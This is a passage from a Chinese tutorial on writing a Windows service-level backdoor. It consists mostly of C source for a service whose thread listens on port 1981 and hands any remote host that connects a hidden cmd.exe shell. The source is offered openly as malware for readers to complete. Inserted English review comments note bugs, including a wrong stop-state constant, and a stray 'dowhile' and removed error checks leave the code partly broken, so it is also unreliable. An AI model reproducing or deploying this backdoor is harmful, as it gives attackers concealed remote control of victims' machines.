服务级后门自己做
作者: 来源: 添加时间:2006-5-23 8:34:38
ServiceStatus.dwCurrentState = SERVICE_RUNNING;
ServiceStatus.dwCheckPoint= 0;
ServiceStatus.dwWaitHint = 0;
SetServiceStatus(ServiceStatusHandle, &ServiceStatus);
//我们用一个事件对象来控制服务的同步
if (!(hEvent=CreateEvent(NULL, FALSE, FALSE, NULL)))
return;
ServiceStatus.dwCurrentState = SERVICE_START_PENDING;
ServiceStatus.dwCheckPoint= 0;
ServiceStatus.dwWaitHint = 0;
SetServiceStatus(ServiceStatusHandle, &ServiceStatus);
//开线程来启动我们的后门程序
if (!(hThread=CreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)MainFn, (LPVOID)0, 0, &dwThreadId)))
ServiceStatus.dwCurrentState = SERVICE_RUNNING;
ServiceStatus.dwCheckPoint= 0;
ServiceStatus.dwWaitHint = 0;
WaitForSingleObject(hEvent, INFINITE);
CloseHandle(hThread);
ExitThread(dwThreadId);
CloseHandle(hEvent);
return;
}
上面我们调用了一个服务控制函数BDHandler(),由于只是简单的介绍,我们这里只处理服务停止控制请求的情况,其它暂停、恢复等功能,读者可以自己完善。下面是对BDHandler()的实现代码:
/*
 * Service control handler for this service.  Only SERVICE_CONTROL_STOP is
 * acted on; every other control code reaches the default label and is
 * ignored.  The handler does not stop the worker itself: it reports
 * STOP_PENDING to the SCM, signals the hEvent event object that the
 * service's other thread blocks on, and then reports the final state.
 *
 * dwControl: control code delivered by the Service Control Manager.
 *
 * NOTE(review): the final state written below is SERVICE_STOP, which in
 * winsvc.h is a service *access right*, not a dwCurrentState value; the
 * state code for a stopped service is SERVICE_STOPPED.  Also, the final
 * state is reported immediately after SetEvent(), before the thread waiting
 * on hEvent has actually done its cleanup, so the SCM may consider the
 * service gone while it is still running.  Code left unchanged here.
 */
void WINAPI BDHandler(DWORD dwControl)
{
switch(dwControl)
{
case SERVICE_CONTROL_STOP:
// Tell the SCM a stop is in progress before the worker is signalled.
ServiceStatus.dwCurrentState = SERVICE_STOP_PENDING;
ServiceStatus.dwCheckPoint= 0;
ServiceStatus.dwWaitHint = 0;
SetServiceStatus(ServiceStatusHandle, &ServiceStatus);
// Set the event to the signalled state so the thread waiting on it can proceed.
SetEvent(hEvent);
ServiceStatus.dwCurrentState = SERVICE_STOP;
ServiceStatus.dwCheckPoint= 0;
ServiceStatus.dwWaitHint = 0;
// Report the stop to the SCM (see the NOTE above about the state value used).
SetServiceStatus(ServiceStatusHandle, &ServiceStatus);
break;
default:
break;
}
}
服务控制函数搞定了,下面就剩下主体的后门函数了。本程序借用了N多前辈翻写过了无数次的后门程序,通过开一个端口监听,允许任何与该端口连接的远程主机建立信任连接,并提供一个交互式Shell。为了代码清晰,我去掉了错误检查,整个过程很简单,也就不多解释了,黑防上都有N期介绍了,代码如下:
DWORD WINAPI MainFn(LPVOID lpParam)
{
WSADATA WSAData;
struct sockaddr_in RemoteAddr;
DWORD dwThreadIdA,dwThreadIdB,dwThreadParam=0;
PROCESS_INFORMATION processinfo;
STARTUPINFO startinfo;
WSAStartup(MAKEWORD(2,2),&WSAData);
ServerSocket = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
RemoteAddr.sin_family = AF_INET;
RemoteAddr.sin_port = htons(1981); //监听端口
RemoteAddr.sin_addr.S_un.S_addr = INADDR_ANY;
bind(ServerSocket,(LPSOCKADDR)&RemoteAddr,sizeof(RemoteAddr));
listen(ServerSocket, 2);
varA = 0;
varB = 0;
CreateThread(NULL, 0, ThreadFuncA, NULL, 0, &dwThreadIdA);
CreateThread(NULL, 0, ThreadFuncB, NULL, 0, &dwThreadIdB);
dowhile((varA || varB) == 0);
GetStartupInfo(&startinfo);
startinfo.dwFlags = STARTF_USESHOWWINDOW|STARTF_USESTDHANDLES;
startinfo.hStdInput = hReadPipe;
startinfo.hStdError = hWritePipe;
startinfo.hStdOutput = hWritePipe;
startinfo.wShowWindow = SW_HIDE; //隐藏控制台窗口
char szAPP[256];
GetSystemDirectory(szAPP,MAX_PATH+1);
strcat(szAPP,"cmd.exe");